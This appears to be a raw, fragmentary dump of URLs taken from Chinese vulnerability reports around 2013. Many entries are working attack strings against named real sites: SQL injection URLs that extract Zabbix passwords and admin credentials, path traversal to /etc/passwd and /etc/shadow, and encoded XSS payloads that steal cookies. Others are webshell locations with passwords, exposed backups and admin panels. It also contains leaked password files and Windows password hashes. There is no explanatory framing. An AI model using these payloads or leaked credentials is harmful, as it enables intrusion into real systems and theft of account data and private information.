http://www.wzvcst.edu.cn/c:/ http://www.fydx.gov.cn/c:/ http://www.shsfkyy.com/c:/ http://www.linhai.cn/c:/ http://www.qinglanji.com/index.php?app=article&ac=collect http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf[/flash http://bbs.xd.com/forum.php?mod=viewthread&tid=1549705&extra= http://www.xd.com/zhaopin?id=863&category=%E7%AE%A1%E7%90%86%E5%9F%B9%E8%AE%AD%E7%94%9F&title=%E7%AE%A1%E7%90%86%E5%9F%B9%E8%AE%AD%E7%94%9F http://stockdata.stock.hexun.com/xsjj/data/sumsearch.aspx?callback=hxbase_json0&count=30&endDate=2013-10-31&page=1&searchContent=%C7%EB%CA%E4%C8%EB%B9%C9%C6%B1%B4%FA%C2%EB/%C3%FB%B3%C6&startDate=2013-10-01 http://stockdata.stock.hexun.com/xsjj/data/sumsearch.aspx?callback=hxbase_json0&count=30&endDate=2013-10-31&page=1&searchContent=%C7%EB%CA%E4%C8%EB%B9%C9%C6%B1%B4%FA%C2%EB/%C3%FB%B3%C6&startDate=2013-10-01 https://licai.baidu.com/card/0/auth/0/sendsms/0?mobile=随意手机号 http://www.ztbest.com/UserControls/morenewlist.aspx?type=1 http://www.people.com.cn/GB/32306/33232/7518682.html https://www.dnspod.cn/OAuth/Authorize?client_id=10005shit&redirect_uri=https%3A%2F%2Fsupport.dnspod.cn%2FSupport%2Flogincallback%22/%3E%3Cscript/src=//JS地址%3E%3C/script%3E%3Cimg\%22&response_type=code http://www.appeasou.com/user!userLogin.action http://www.ahwh.hrss.gov.cn/news.php?id=3356 http://www.ahwh.hrss.gov.cn/news.php?id=3356 http://www.statsedu.com/staedu/portal/index.do http://www.statsedu.com/staedu/portal/index.do encap:Ethernet B4:B5:2F:51:DF:50 addr:192.168.1.62 Bcast:192.168.1.255 Mask:255.255.255.0 b6b5:2fff:fe51:df50/64 Scope:Link MTU:1500 packets:1388172131 packets:1411189020 txqueuelen:1000 http://www.bankingedu.cn/staedu/portal/index.do http://www.bankingedu.cn/staedu/portal/index.do http://www.bankingedu.cn/staedu/portal/niliu.jsp root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin 
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin wenhua:x:500:500:wenhua:/home/wenhua:/bin/bash http://shipin.beijing.gov.cn/index.php?option=com_content&ItemId=2 http://cnafc.ulearning.cn/nafcedu/index.html www.ccvic.com.cn http://ccvic.net/admin.php http://points.jinlinghotels.com/ http://www.chinaconstruction.com/5xwzx_2xmxw_xx.aspx?nid=10334 http://www.foxitsoftware.cn/company/press_details.php?&url=../../../../../../etc/passwd http://igaga.cn http://www.landbank.gov.cn/www.zip www.xiaomi.cn使用phpcms搭建 
http://www.xiaomi.cn/api.php?op=ajax_domain&url=/etc/passwd http://beta.longmanenglish.cn/LEI/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://beta.longmanenglish.cn/LEI/LEI.war http://www.hyxjgj.com/ http://hoteladmin.byecity.com/tmpordermanage/DefaultTrue.aspx http://hoteladmin.byecity.com/tmpordermanage/OrderDetailTrue.aspx?orderId=278507&tradeId=297279 http://job.vanke.com/Web/Login.aspx http://58.30.217.121 http://58.30.217.121/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://58.30.217.121/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://wf.smesd.gov.cn/view.jsp?id=195429 http://ly.smesd.gov.cn/view.jsp?id=216139 http://hz.smesd.gov.cn/view.jsp?id=248863 http://flfw.smesd.gov.cn/view_liuyan.jsp?id=564 http://glzxxh.smesd.gov.cn/view_liuyan.jsp?id=785 http://jin.smesd.gov.cn/view.jsp?id=258489 http://zzh.smesd.gov.cn/view.jsp?id=203826 http://center.smesd.gov.cn/site/jining/jining/view.jsp?id=179970 www.labi.com http://www.zhujiwu.com/robot/feedback.asp http://www.zhujiwu.com/robot/feedback.asp http://www.zzmama.com http://bbs.zzmama.com/onews.asp?id=176 http://bbs.zzmama.com/admin/index.asp http://www.zzmama.com/admin/adminlogin.asp https://pdc.vanke.com http://www.one-tv.com/sysmanage/ http://91baby.mama.cn/bbbar.php?1383009755 http://www.mama.cn/ask/q3703444-p1.html http://223.4.175.155/ctrl.php?r=site/login 
http://219.143.252.178/ http://kjt.ahinfo.gov.cn/console/login/LoginForm.jsp http://www.jdxf.gov.cn/readnews.php?newsid=4296 http://www.jdxf.gov.cn/readnews.php?newsid=4296 http://pt-mbb.ele.me/comment http://59.151.23.227/MemberInfo http://monk.uboxol.com/morder/notShipped?clientversion=4.2.1&machine_type=Iphone5&os=7.0&channel_id=1&device_no=abc&imei=&device_id=2&u=530004&wake_id=0&net_type=1&carrier_type=1&s=1 http://219.134.93.143/crmvermgr/ http://219.134.93.143/crystalreportviewers10/ http://crm.shenzhenair.com/crmupdownload/ http://gamebbs.kedou.com/forum.php)是网维大师旗下的一个网站,可用网维大师帐号登录顺网。 http://icafe8.com http://202.107.204.35/stat/login.jsp?templateStatId=1155 http://www.hcgp.gov.cn/console/login.htm http://box.7k7k.com/.viminfo http://box.7k7k.com/manager.tar.gz http://tzxm.fuyang.gov.cn/web/login.action http://tzxm.fuyang.gov.cn/Silic.jsp http://123.232.0.241:7001/aims/jsp/public/login.jsp http://blog.xiami.com/wp-admin http://www.rsks.czs.gov.cn/siexam/person/webApply.action http://my.xizi.com/index.php?r=user/addfollow&callback=jQuery17209595374003984034_1383139467140&follow=1&uid=关注者ID&touid=被关注者ID&_=1383139469893 www.yngbzx.cn http://www.yngbzx.cn/Article/ArticleDetaileNews.aspx?type=1 http://www.yngbzx.cn/Article/ArticleDetaileNews.aspx?type=1 http://221.209.11.110:8085/wcb/login.action http://newcar.xcar.com.cn/photo_index.php?serid=122 http://transfer.airchina.com http://transfer.airchina.com/web.rar http://transfer.airchina.com/include/func.inc http://transfer.airchina.com/admin/member/ http://transfer.airchina.com/test.php http://transfer.airchina.com/admin/main.php http://fn-sso.ceair.com:7010/sso/sso-login.do http://www.hndfz.hunan.gov.cn/View/ViewPictFrm.aspx?id=206&cid=1 http://bbs.shendu.com/thread-2606000-1-1.html http://www.cregc.com.cn/index2.asp满屏的注入点。成功上传我们的shell密码admin http://www.cregc.com.cn/news/2.asp。探测了下磁盘权限。蛮的大 http://www.facrs.com/dama.asp。密码ice http://vforum2013.cloud-expo.com.cn/ 
file://C:\Users\用户名\AppData\Roaming\360CloudWifi\expuser.log路径里, http://w.yunpan.360.cn/intf.php http://w%s.yunpan.360.cn/intf.php?method=WifiUser.login&qid=%s&devtype=Wifi&v=&devid=%s&devname=&rtick=6198368&sign=%s& http://api%s.yunpan.360.cn/intf.php?method=User.getUserDetail&qid=%s&devtype=Wifi&v=1.0.0.1030&devid=%s&devname=&rtick=6211423 http://api%s.yunpan.360.cn/intf.php?method=File.getAllNodesV2&qid=%s&devtype=Wifi&v=1.0.0.1030&devid=%s&devname=&rtick=5350229 http://api%s.yunpan.360.cn/intf.php?method=File.delete&qid=%s&devtype=Wifi&v=1.0.0.1050&devid=%s&devname=&rtick=11609065 file://C:\Users\用户名\AppData\Roaming\360CloudWifi\expuser.log中的devid和skey jld.cq.gov.cn/bszn/bsznRight.jsp?id=210&flag=1 android:name=".broadcastReceiver.CloudMessageReceiver android:name="com.jd.msg android:name="com.jd.register.action android:name="com.jd.msg android:name=".providers.BuddyProvider android:readPermission="com.xiaomi.channel.READ_BUDDY android:writePermission="com.xiaomi.channel.WRITE_BUDDY android:exported="true android:authorities="com.xiaomi.channel.providers.BuddyProvider android:name="com.xiaomi.channel.READ_BUDDY android:name="com.xiaomi.channel.WRITE_BUDDY android:name="com.xiaomi.channel.READ_BUDDY android:name="com.xiaomi.channel.WRITE_BUDDY http://vip4.exlive.cn/synthReports/loginGpsAction_login.action http://20years.china-chigo.com/zhigao/zhigao!getProvice.action老友签到这里可以上传任意文件,通过上传JSP,PHP脚本可以获取webshell http://mini.10010.com/system/login.shtml http://www.ztejtw.com.cn//FCKeditor/editor/filemanager/connectors/php/userfiles/icesword%281%29.aspx http://www.111g.com/?ct=news&ac=search http://www.111g.com/?ct=news&ac=search http://www.jinou.cn/queryGame.action?id=75&indexPage=0 http://ec.guanyisoft.com/,采用PHPCMS http://xszz.zjedu.gov.cn http://www.dasi.gov.cn/new/hwcrm/login.php http://219.135.157.142:9000/irpt/oem/grpslogin.jsp http://china.aliued.com/ http://webmail.aliued.com/readme.txt http://webmail.aliued.com/.svn/entries 
http://www.yjhl.gov.cn/WebRoot/fwageAction!list.action http://www.111g.com/?ct=glogin&game_id=2&server_id=12 http://www.111g.com/?ct=glogin&game_id=2&server_id=12 http://www.hjsd.cn/ www.ubox.cn http://222.56.46.87:8096/ http://www.ztewelink.com.cn/ewebeditor/admin/ http://jiaoyou.58.com/user/follow?uid=10475096157702&d=1383231187246 http://jiaoyou.58.com/photo/ajaxdeletephoto?id=22099841704474 http://www.vmovier.com/wp-content/themes/HotNewspro/share_statistics.php URL:http://121.***.***.122:8090/ http://121.***.***.122:8090//general/vmeet/wbUpload.php?fileName=test.php.111 http://121.***.***.122:15698/ data:text/html,biduwebdata,也就是显示错误信息;由于这个data:协议非常容易伪造,给了这个脚本可乘之机; http://wlan.ct10000.com/portal/dwr/call/plaincall/DwrHandlerClass.send.dwr http://wlan.ct10000.com http://wlan.ct10000.com/portal/dwr/test/DwrHandlerClass http://140.207.194.192:8080/ http://tuchong.com/1/,帐号名:webmaster想必应该是管理员的帐号。 http://xd2.hupu.com/?s=3 http://nslm.hupu.com/?s=13 http://elreport.ce-air.com/elreport/index.jsp http://club.suning.com/admin.php http://www.ftms.com.cn//information/news_detail.php?id=186 http://www.ftms.com.cn/phpMyAdmin/ http://www.ftms.com.cn/phpMyAdmin/ http://www.amtium.com/news_detail.jsp?NewsID=194 http://pk.tom.com:80/ http://220.181.153.53:8080/a http://220.181.153.197/index.do http://www.q5.com/ http://bbs.lusen.com/home.php?mod=space&uid=614766&do=blog&id=4079 http://pda.zto.cn data:text/html;base64,PHNjcmlwdD5hbGVydCgnSFVDLVVOSVN+Qnl+V29veXVuJyk8L3NjcmlwdD4= http://wooyun.org\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u0029\u003e/1.swf http://www.ccpitzj.gov.cn/showlink_E.php?id=23 http://www.ccpitzj.gov.cn/showlink_E.php?id=23 http://www.ccpitzj.gov.cn/admin http://biz.finance.sina.com.cn//meeting/showAllMeeting.php?year=2012 
http://biz.finance.sina.com.cn/lc/detail.php?id=47499 http://biz.finance.sina.com.cn/ask/power.php http://xs.zj165.com http://e.zj165.com http://xy.zj165.com http://xy.zj165.com/z1.jsp http://www.ahdongzhi.gov.cn/test.txt http://www.gionee.com/get/product/all?type=88952634&face=88952634&cat=88952634&o=88952634&=%E4%B8%B4%E6%97%B6%E6%8C%89%E9%92%AE http://www.tuinvlang.com/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319 http://pimg2.gaitu.com/site.rar http://topic.xcar.com.cn/201107/jlys/cszp.php?pic=715871 http://topic.xcar.com.cn/201107/jlys/cszp.php?pic=715871 http://product.digi.163.com/digi/view!brand.action?&count=2574&parentid=00DG0JaD0PYU0PYZ&p=12 http://mo.vancl.com/mobileapp/mobile/system/loginAction!queryAuthCode.do http://www.jukuu.com/dormd.php?id=107322273999999 http://www.jukuu.com/dormd.php?id=107322273999999 http://wap.sina.com.cn/ http://wap.sina.com.cn/ http://exchange.lorealparis.com.cn/存在后台弱口令,后台地址:http://exchange.lorealparis.com.cn/admin_login/index.aspx后台里面有几百条会员相关数据信息 http://lib.hnswdx.gov.cn/news.asp?bigid=800&smallid=8001 http://www.pigai.org/ http://tanchun.pigai.org/index.php?c=v2&a=view&eid=1386435 http://ideaclub.lenovo.com.cn/club/index.php?m=goods&c=lists http://sms.haiercrm.com/smssend/login.jsp http://expert.womai.com/ http://sebug.net/vuldb/ssvid-20811 http://www.zcsfda.gov.cn/info_Print.asp?ArticleID=377 http://115.182.51.140/html/encoder/index.html http://115.182.51.141/html/encoder/index.html http://bgy.ata.net.cn/CUST01hgkw/Login.aspx http://xss.tw/**** http://www.111g.com/?ct=servers&game_id=11 http://www.111g.com/?ct=servers&game_id=11 http://partner.kingdee.com/user/login.action http://beian.cndns.com/ http://115.182.51.129/html/encoder/index.html http://115.182.51.131/html/encoder/index.html http://115.182.51.133/html/encoder/index.html 
http://115.182.51.137/html/encoder/index.html http://115.182.51.135/ http://reg.163.com/reg/mobile/success.do?product=newsclient&isMob=1&account=%E6%82%A8%E8%8E%B7%E5%BE%97%E4%BA%86www.wooyun.org%E9%80%81%E5%87%BA%E7%9A%84%E4%B8%80%E7%99%BE%E4%B8%87QB%EF%BC%8C%E8%AF%A6%E6%83%85%E8%AE%BF%E9%97%AE%EF%BC%9Awooyun.org,%E8%81%94%E7%B3%BBxsser%E9%A2%86%E5%8F%96 http://q.10010js.com/service/qbi/tcpqq.do?code=验证码&randomcode=验证码&q_account=江苏联通号码&q_number=QQ号码&q_count=QB数量 http://q.10010js.com/service/qbi/tcpqq.do?code=595760&randomcode=595760&q_account=18602577777&q_number=123456&q_count=20 http://www.baomi.org/ http://www.baomi.org/bbs.rar android:name=".providers.YouNiProvider android:process="com.snda.youni.mms android:authorities="com.snda.youni.providers.DataStructs android:name=".providers.ArchiveProvider android:process="com.snda.youni.mms android:authorities="com.snda.youni.providers.ArchiveDataStructs android:name="com.snda.youni.providers.UnreadcountProvider android:process="com.snda.youni.mms android:authorities="com.snda.youni.providers.UnreadcountProvider http://avata.sdo.com/config/config_ucenter.php.bak http://www.cnan.gov.cn/pi.php http://www.cnan.gov.cn/interface/city.php?_f=json&c=0 http://www.gxxnw.gov.cn/hack.asp ftp://172.22.96.9/ ftp://10.36.6.34/ http://172.22.114.10/ http://192.168.11.122/gx_weather/monitor/monitor.action http://10.158.20.10/index.aspx http://support.yeyou.sdo.com/config/config_ucenter.php.bak http://www.zte-e.com/manage/AdminLogin.aspx http://bsm.wandafilm.com/ http://bsm.wandafilm.com/affair/download.jsp?enclosurePath=C%3A%5Ctomcat_bsmitil%5Cwebapps%5CROOT%5C%5Crecordfile%5C222266_20131030_%E9%99%A2%E7%BA%BF_%E5%85%B6%E4%BB%96%5C22.jsp&filename=22.jsp http://bsm.wandafilm.com/affair/download.jsp?enclosurePath=C:\tomcat_bsmitil\webapps\ROOT\\recordfile\222266_20131030_院线_其他\22.jsp&filename=22.jsp http://bsm.wandafilm.com/recordfile/222266_20131030_%E9%99%A2%E7%BA%BF_%E5%85%B6%E4%BB%96/22.jsp,连接菜刀,ok搞定 
http://www.ztekj.com/data/hypersonic/localDB.script http://www.ztekj.com/work/jboss.web/www.ztekj.com/ http://sqdj.gov.cn/baidunews/wKkE/index.html http://www.zgsuixian.gov.cn/a/zhengwuhudong/20130911/21928.html http://www.fangxian.gov.cn/html/xwzx/szyw/2013-04/1598.html http://www.tyxjyj.gov.cn/lwz/gxxwz/29259/index.asp http://www.crfebgz.com.cn/admin/ http://www.crfebgz.com.cn/Upfile/20131031105359.asp;.jpg http://219.232.246.252:8000/ http://topic.xcar.com.cn/201109/jrgz/?tjid=1542908 http://topic.xcar.com.cn/201109/jrgz/?tjid=1542908 http://party.vmovier.com/wp-login.php javascript:location.href='xxx http://www.abp.gov.cn/plann/web_descript.action?paramsId=20 http://www.xmyg.gov.cn/index.action http://xm.zjkjt.gov.cn/redirect.action http://www.wh-price.gov.cn/cms/frontpage/price_monitor/PriceTypeList.action?type=1 http://www.12371.rzdj.gov.cn/index-pic.action?part=dqld http://lpa.nmfda.gov.cn/eduOnline/novalidateAction/queryIndexqueryByid.action?tblinfo.tblid=3062 http://www.informatization.gov.cn/cateinfo.action?info_id=628 http://www.lntl.hrss.gov.cn/page/qtnews/zcfgneirong.action?info.id=3221 http://live.fshealth.gov.cn/smjkfw/wsyygh/toresourcepage.action http://pcab.nlc.gov.cn/xwdt/viewNews.action?id=33657 http://www.tzyonganzhou.gov.cn/gaikuangshow.action?id=2 http://60.30.66.195:9080/ldrk/login.do http://www.cnvc.org.cn http://mms.wo.com.cn/DownLoadFile?filePath=/../../../etc/passwd http://mms.wo.com.cn/DownLoadFile?filePath=/../../../etc/shadow http://appserver.lenovo.com.cn/Lenovo_Search.aspx?flag=1&rackcode=A21B07C06&searchBeginValue=0&searchEndValue=5000 http://cifj.trs.com.cn/login.jsp http://cifj.trs.com.cn/login.jsp http://218.207.67.218 http://3g.km169.net http://3g.km169.net/database/ http://eshop.shenzhenair.com/szair/mc/login.jsp http://www.hbstars.com//news/visitcount.aspx?ID=1 http://www.hbstars.com:80/news/visitread.aspx?ID=1 http://sqlmap.org http://m.m.58.com/reg/?from=index_reg http://www.huangling.gov.cn/article_view.php?id=7189存在注入漏洞注入之 
http://www.huangling.gov.cn http://hlwhg.huangling.gov.cn/include/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php http://hlwhg.huangling.gov.cn/include/help.php web_huangling:WEB:7C790716BD252CEAAAD3B435B51404EE:F44823C445FB28BE74F1F39392FC WORKGROUP:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C web_other:WEB:7C790716BD252CEAAAD3B435B51404EE:F44823C445FB28BE74F1F39392FCC910 hlsb:WEB:F2BE0A13F1EE3BB4C187B8085FE1D9DF:EB74617A20DF0C89A3EAA14A536EAC7D Administrator:WEB:E280FA1F3A7179C509752A3293831D17:A130FDC91288F65B7D617DDB9314 xiawaftp:WEB:7C790716BD252CEAAAD3B435B51404EE:F44823C445FB28BE74F1F39392FCC910 xiuper:WEB:B15BCD16468DF7B51867D125921CFDFC:385A43C3BB08F8D78817BF371F25F593 http://cw-info.shenzhenair.com/sett/ http://202.106.212.183:8080/iptvstat/Login.action http://123.15.54.36:8888/u-dsm/login.do http://czj.hcq.gov.cn/hcczcgweb/admin/notice.asp?Action=view&ID=489 http://czj.hcq.gov.cn/news_detail.asp?id=565 http://czj.hcq.gov.cn/hcczcgweb/admin/notice.asp?Action=view&ID=401 http://czj.hcq.gov.cn/hcczcgweb/admin/notice.asp?Action=view&ID=350 http://czj.hcq.gov.cn/hcczcgweb/admin/notice.asp?Action=view&ID=344 http://dg.soufun.com/market/lawyer/MLogin.asp http://1626.tudou.com/ http://news.1626.com/ http://cms.icafe8.com/ http://papers.cnki.net/liuyan19880716该用户粉丝8个,其中李阳关注了他 http://bj.soufun.com/market/zbsystem/ http://muscle.tudou.com/muscle/user/index http://calpis.tudou.com/calpis/user/index http://180.166.109.162/register.action http://blog.douguo.com//wp-includes/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://ask.m.yiche.com/Detail/3575179/ http://www.grn-group.com/index.php/web_email/save http://www.to-wallstreet.com/system/login.do http://112.124.3.235:88/zte/index!index.action中兴新思办学运营系统 http://www.subaru.cn/racing.asp?id=114+and+1=2+union+select+1,name,password+from+admin 
http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://www.cmatc.cma.gov.cn/www/res/index/index.shtml http://210.77.176.44/ http://www.airpp.cn/ppbid/sys/loginAction!initLoginXY.action http://113.108.100.136/jobmaster/information/showpage.do http://www.czsie.com.cn/ http://edu6.teacher.com.cn/tln023a/readme.txt http://www.hdshangbiao.com/ http://news.gbicom.cn http://114.80.121.81/login.action http://114.80.121.81/login.action http://114.80.121.81/1.txt site:zhubajie.com inurl:xls http://id5any.id5.cn:8888/login/login!validateUser.action http://id5any.id5.cn:8888/test.txt http://www.ciprun.com/ http://www.ciprun.com//admin/privilege.php?act=login http://www.csbidding.com/nhzb/ http://data.futures.hexun.com/dpic/drawcccj.ashx?sType=2&sBreed=10301010000&sContract=A1405&sDate=2013-11-01&sRank=20 http://data.stock.hexun.com/include/AjaxSearch2011.ashx?type=stock&key= http://gs.cswa.com/Login.aspx http://gs.cswa.com/default.aspx进入系统 http://gs.cswa.com/tddetail.aspx?file_id=54600可遍历ID访问。 http://gs.cswa.com/LXDetail.aspx?file_id=341 http://ebast.zte.com.cn/filesrepository/ http://ebast.zte.com.cn/filesrepository/112233/TI2G/HOT11223344-2011-04-TI2G-0023/112233-BAUT-170720111842.htm https://210.21.223.37/eAgent/Application/ http://218.65.5.218/ctstyzt/test/,九江职业技术学院船体识图与制图在线测试系统,数据库文件为/Manager/database/TestOnlineDB.asa由于是asa文件,所以我们直接在留言处插一句话,然后连接数据库就直接拿shell了 http://www.steel-mall.com//invoker/JMXInvokerServlet http://edos.heinz.com.cn http://edos.heinz.com.cn/jmx-console/ http://219.135.147.234:9080/astat/auth/login.action http://219.135.147.234:9080/astat/Silic.jsp http://shop.heinz.com.cn/test.php http://edos.heinz.com.cn/jmx-console/ http://edos.heinz.com.cn/OnDemand/loginAction.action http://www.jukuu.com/doreport.php?id=123456789d http://211.139.95.67:8080/login.action http://211.139.95.67:8080/Silic.jsp 
http://27.22.85.224:8066/cms/frontpage/pubinfo/PubinfoDetail.action http://222.187.113.99/xzxxgk/nrglIndex.action http://issbbs.shunwang.com http://issbbs.shunwang.com/robots.txt/1.php http://issbbs.shunwang.com/attachments/month_1310/131029104380eb5b80a4940c03.png/1.php http://cga.dlgjz.gov.cn:7002/console/login/LoginForm.jsp http://wap.lenovo.com.cn/web2/html/login.html http://www.jyjtys.com/zgAdmin/login.asp http://www.axwater.gov.cn/zgadmin/login.asp http://www.mnfzjz.com/zgadmin/login.asp http://www.jinbukeji.com/zgadmin/login.asp http://www.rszxwsy.com/zgadmin/login.asp http://www.gasnyj.com/zgadmin/login.asp url:http://my.xizi.com/index.php?r=user/profile&uid=1973033 http://my.xizi.com/index.php?r=user/profile&uid=1973033”发给版主 http://meizhi.cn/Channel/image/aid/322/id/1425跳到这里 http://meizhi.cn/UserPlace/mypic/uid/100297 http://kagome.tudou.com/kagome/user/index http://218.94.38.236/meeting/app/meetinglist/todayDataList.action?site=box&portalLocale=&menuname=24000_24001_24002 http://218.94.38.236/download/ http://ued.aili.com http://ued.aili.com/?author=1 http://ued.aili.com/?author=20 http://ued.aili.com/wp-login.php http://www.tudu.im http://www.tudu.im/suggest/ www.17k.com上,点开任意一个小说页面 http://blog.nd.com.cn/ http://blog.nd.com.cn/wp-login.php http://cp.corp.56.com http://cp.corp.56.com/wp-login.php http://mango.jinti.com/ShowPrizeList.aspx?PrizeTypeID=0 http://archives.hainan.gov.cn/1.zip http://lib.zjdx.gov.cn/1.rar http://www.tcom.gov.cn/web.rar http://www.tcom.gov.cn/web.zip http://www.zzkjw.gov.cn/zzkjw.gov.cn.rar http://222.168.22.245 http://www.lzrta.cn/admin/ http://www.lzrta.cn//upfiles/image/shell.asp/z/20131103210220.jpg http://219.239.44.183/ http://219.239.44.63/main/frame.asp?language=Chinese&site_id=MjA4&service_type=MA==# http://219.239.44.26/UDS/Views/Home/Index.aspx http://219.239.44.136/logon,一个让人不明觉厉的系统 http://zgqxb.cma.gov.cn:81/userAction_login.action;jsessionid=FFB98AF80AF616FACD066766862B4AA1 
http://www.crsp.org.cn/,扫描后直接爆出一个BBS的RAR,估计是备份所致,然后打开后,后台的各种数据,SQL数据,都历历在目! http://www.crsp.org.cn/bbs.rar,下载出来一看,全站的东西,都在,包括admin的登录信息,和很多重要的其它资料,(包括dede的一些信息,)然后浏览了下数据库信息,见漏洞证明图片! http://cs.jinti.com/ListAllClass.aspx?classids=3,2,8 http://124.227.192.123:8088/www.zip http://www.diyicai.com/.bash_history http://wooyun.org/bugs/wooyun-2013-037625 http://minisite.youku.com/newproduct/event/apple912/getfile.php?file=/var/www/html/youkubj-pms/user/admin_user.php http://minisite.youku.com/youkubj-pms/user/admin_user.php http://www.joyu.com/dangzheng/news_detail.asp?id=793 http://cife.trs.com.cn/login.jsp http://www crfeb03.com/list.php?fid=34加个'发现报错。跑了一下 http://minisite.youku.com/sql07my08admin08/ http://lljiuzhu.mca.gov.cn/web/UserAction.do?method=getLoginInfo http://www.jobui.com/mianshiti/it/java'/ http://promotion.taobao.com/circles/findFriend.do?p=手机号 http://promotion.taobao.com/circles/findFriend.do?p=13505502232 http://vcm.xiaoying.co/feedbackInfo/queryAllFeedbackInfo.do http://www.wandoujia.com/apps/com.quvideo.xiaoying url:http://www.12ipo.com/ http://vip.cswa.com/EpareEmpInfo/ http://vip.cswa.com/EpareEmpInfo/EmpLogi http://iautos.auto.ifeng.com/caidao.php http://t.zhenai.com/common/getComments.do?callback=jQuery18309714489171747118_1383582025205&comment.moduleType=0&comment.specialType=94&pageIndex=1 address:tennis.com.cn/MySqlAdmin/index.php http://www.horise.com/HoriseSite/News/NewsList.aspx?cIndex=1&industry=1 http://mybaby.com.cn/index.php?c=space&a=default&uid=151176 http://comment1.ynet.com/comment.newView.action?csTitleId=62182&toPage=1 http://cp.27.cn:80/?product-picsJson.html&gids=a http://www.jinou.cn/queryGame.action?id=75&indexPage=0 address:www.dm123.cn/pma/index.php address:www.chinamac.com/china/index.php http://119.10.114.245:8080/ http://119.10.114.245:8080/upload/ http://119.10.114.245:8080/upload/error.jsp http://v2.shenzhenair.com/ http://demo.74cms.com/admin 
http://news.jinku.com/cj/topic_function.php?action=pollIns&ins=toplinlist&flages=90%20flages=90 http://bbs.ccidnet.com/admin.php http://www.v5shop.com.cn/ http://www.v5shop.com.cn/v5shopadmin/login.php http://www.v5shop.com.cn/uploads/soft/131105/5_1103065101.php http://www.sh17.com/admin/webedit/admin_add.asp http://www.sh17.com/admin/index.asp http://211.144.193.6/ http://www.bailetang.com/products/201145185547.htm http://cmsv53.xywy.com cmsv53.xywy.com/mycontrol/cmsmycontrol/login.php http://cmsv53.xywy.com/mycontrol/fix.php http://bobo.cztv.com/ http://bobo.cztv.com/admin.php http://ideaclub.lenovo.com.cn/club/index.php?c=login&f=verifyUsername&m=member&t=Tue http://ideaclub.lenovo.com.cn/club/index.php?c=login&f=verifyUsername&m=member&t=Tue http://trip.cmbchina.com/ 